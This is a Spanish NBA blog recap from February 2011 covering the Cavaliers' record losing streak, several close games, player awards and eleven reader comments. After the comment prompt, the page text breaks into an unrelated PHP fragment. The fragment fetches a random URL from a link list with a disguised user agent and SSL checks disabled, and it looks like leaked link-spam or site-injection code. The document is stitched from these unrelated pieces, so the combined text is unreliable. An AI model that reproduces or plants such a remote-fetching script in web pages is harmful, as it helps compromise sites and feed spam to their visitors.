La Crónica (09/02/2011)

10 de February de 2011 por TheDeerHunter

byronLo han conseguido. Un hito histórico el de los Cavs, que con su 26ª derrota consecutiva (103-94) alcanzan la peor racha del país en cualquier disciplina y época. El rival, en este caso Detroit, parece lo de menos. Con esa defensa, esa capacidad reboteadora, ese control del juego (17 pérdidas) y, en definitiva, esa plantilla es muy difícil que no pulvericen la marca.

Miramos el calendario y reciben en casa a dos equipos con balances negativos… quizás puedan respirar. El primer envite  será ante los Clippers, quienes asaltaron el Madison Square Garden sin siquiera necesitar un gran partido de Griffin. Los siguientes son los Wizards, pero si alguien respiraba tendrá que mirar el palizón que les dieron a los Bucks. El siguiente ya serían Lakers. Los augurios no son nada buenos para los Cavaliers. Su “caballerosidad” con sus rivales ya se está pasando de castaño oscuro… y lo que te rondaré, morena.

En la competición de verdad mucha emoción y buenos partidos. Quitando los Spurs, que necesitaron de un gran último cuarto en Toronto (111-100) con Blair vestido de Shaquille, en el resto hubo lío del bueno.

Curioso el caso de Charlotte y el de Denver. Ambos renunciaron al tiempo muerto con posesión y segundos disponibles para ganar. En ambos casos el resultado fue catastrófico. Los Bobcats terminaron perdiendo contra Indiana (103-104), con Hibbert sobresaliente, y los Nuggets en Oakland (114-116) en uno de esos partidos de Monta Ellis.

boozdwill

Los Hornets nadaron hasta la prórroga para ahogarse en casa contra los Nets (101-103). Tuvieron el partido en sus manos tanto en el reglamentario como en el final, con un triple que se salió de Paul. Vujacic los destrozó. Cómo se le ha abierto el cielo al esloveno.

Los Mavs ganaron de milagro en Sacramento (102-100) con un partido impresionante de Barea.

Para terminar dos buenos duelos entre equipos que harán postemporada. Orlando ganó a los Sixers (99-95), que no pudieron parar a Howard en ningún momento, y Chicago ganó en Salt Lake City (91-86), en el partido del morbo que suponía el regreso de Boozer pero con Rose tomando el protagonismo y destrozando a Deron Williams.

PREMIOS

dwight sixersMVP: Ni uno solo de los 30 puntos, 17 rebotes, 2 robos y 2 tapones de Dwight Howard sobraron en la ajustada victoria de los Magic en Philadelphia. Fue un día propicio para pívots jóvenes, con destacadísimas actuaciones de DaJuan Blair y Roy Hibbert en las victorias de sus respectivos equipos.

Rookie: En un día bastante discreto para lo que suele ser Blake Griffin, nos permitimos dar el premio a John Wall, muy completo ante los Bucks con 15 puntos, 7 rebotes, 6 asistencias, 2 robos y 1 tapón.

Sorpresa: The Machine!! Sasha Vujacic jugó ante los Hornets como si de un entrenamiento a las 11 de la mañana se tratase y se fue a los 25 puntos con 9 de 14 en tiros, incluyendo 5 triples, además de 4 rebotes y 4 asistencias.

Decepción: El duelo Chris Paul vs Devin Harris prometía ser eléctrico, pero en cambio se anularon mutuamente y dejaron el espectáculo en manos de otros.

Esfuerzo en vano: Ramon Sessions, J.J. Hickson y Antawn Jamison hicieron lo que pudieron, pero el infausto record de los Cavs ya forma parte de los libros de historia. Aunque la actuación más destacada entre los perdedores fue la de David West, inmenso en New Jersey con 32 puntos, 15 rebotes, 5 asistencias y 3 robos.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Lo de los Cavs es algo tristísimo…supongo que ahora se entiende la verdadera dimensión de Lebron (con LJ mejor equipo de la liga, sin él peor equipo de la historia) y eso que el “Choosen One” no es santo de mi devociOn pero al César lo que es del César.

    Parece ser que las “pasantías” con Hakeem han hecho maravillas es Howard no? Su variedad de movimientos en el poste se haa incrementado de una manera muy notable. No sé si en números pero es el año que mejor le he visto jugar con muchísima diferencia

      Citar

  2. Jose Luis dice:
    #2

    No es solo LeBron hombre; es LeBron, West, Shaquille, Ilgauskas, Varejao lesionado, Mo-Williams lesionado, aparte de tener que innovar todos los sistemas porque con LeBron se juega de una forma, y si le cambias por Anthony (por poner un alero de nivel similar), ya tienes que jugar de una forma totalmente distinta , y si encima no consigues nada a cambio… apaga y vámonos xD

      Citar

  3. Cocinitas dice:
    #3

    El premio del rookie se lo daria a Demarcus Cousins vaya partido anoxe, creo q sacramento tiene buenas mimbres con él y Evans para construir un buen equipo.

      Citar

  4. Denise dice:
    #4

    El articulo 34 de ‘Hago lo que quiero, cuando quiero, como quiero y cuando me da la gana” ha pasado a ser el articulo 12

      Citar

  5. MagicJohnson32 dice:
    #5

    La marcha de un jugador franquicia siempre deja al equipo en una especie de estado de shock. Ha pasado históricamente y es normal. Más aun en este caso y de la manera en que se produjo. Y si a la marcha de LBJ se le suma lo que comenta José Luis, pues eso, de récord.

    Vaya rachita lleva Blair. Si lo mantiene, creo que le darán vacaciones a Duncan en muchos partidos.

      Citar

  6. HisRoyalAirness dice:
    #6

    Sí, la verdad es que no había contado con lo de “Big Z” y Varejao pero con las lesiones también convivieron el año pasado (la de Shaq, sin ir más lejos) y les fue mejor porque estaba LJ. Que conste que no considero a Lebron el jugador ideal para construir un equipo con él de referencia (no me mateis por este comentario) porque lo hace todo bien sí pero condiciona tanto el juego que en los momentos clave el equipo se resiente muchísimo si los contrarios se centran en defenderle y limitarle a él exclusivamente. Con esto quiero decir que el equipo que ha quedado tras su marcha no es todo lo lamentable que demuestran los números pero están perdidísimos en la cancha. Hay equipos que están dando más guerra con las mismas o menos armas.

      Citar

  7. KB # 24 dice:
    #7

    Yo creo que lo ideal para equipos como los cavs del año pasado es tener a gente como Mo Will, anthony parker y jj hickson, varejao, jamison y shaq.

    Gente que te asegure puntos con tiros abiertos despues de que la estrella los haya generado, y gente que despues de fallos en el tiro te asegure segundas oportunidades mediante el rebote.

    La situación ahora ha cambiado mucho, ya que no tienen a ningun jugador capaz de crear estos espacios ni de generar situaciones de ventaja. Y ni mucho menos, gente capaz de crearse sus propios tiros con facilidad.

      Citar

  8. Sancho88 dice:
    #8

    Estoy de acuerdo KB. A los Cavs les ha pasado como a Dubai. Tenían construido el paraíso, se ha ido la pasta (en este caso el crack, pero se estima que la franquicia se ha devaluado 150 millones) y el equipo se hunde a falta de un referente. Una pena, porque yo también pienso que con Varejao y Mo, y Gibson recuperado totalmente… darían mucha más guerra en el Este. Jamison aparece algún día pero no es líder y Hickson necesita progresar aún por su juventud. Yo creo que es todo sicológico, ahora les vienen algunos partidos contra rivales de su nivel en el Este y casi fijo que antes de que acabe la semana tenemos victoria de los Cavs.

      Citar

  9. Sancho88 dice:
    #9

    Seguramente puedan hacerlo contra Wizards. 0-26 fuera de casa me parece, hasta los propios Cavs tienen mejor marca en ese apartado

      Citar

  10. KB # 24 dice:
    #10

    una pregunta, si los cavs son el peor equipo de la liga, créeis que Dorrell Wright puede optar a MIP?
    de 7.1 ppg en miami a 16.7ppg en gsw.
    subiendo 2rpg y subiendo tambien 2apg. mejorando el % de tiro de 3

      Citar

  11. Txusma dice:
    #11

    Como va esa relación entre los Cavs y Dorrell Wright? 😀

    Está claro que es uno de los candidatos pero en este caso parece que viene muy de la mano de un aumento importante de minutos (casi el doble). Algo parecido pasa con Kevin Love, que juega 8 minutos más… No sé, yo creo q de acabar ahora la liga se lo darían a Love.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>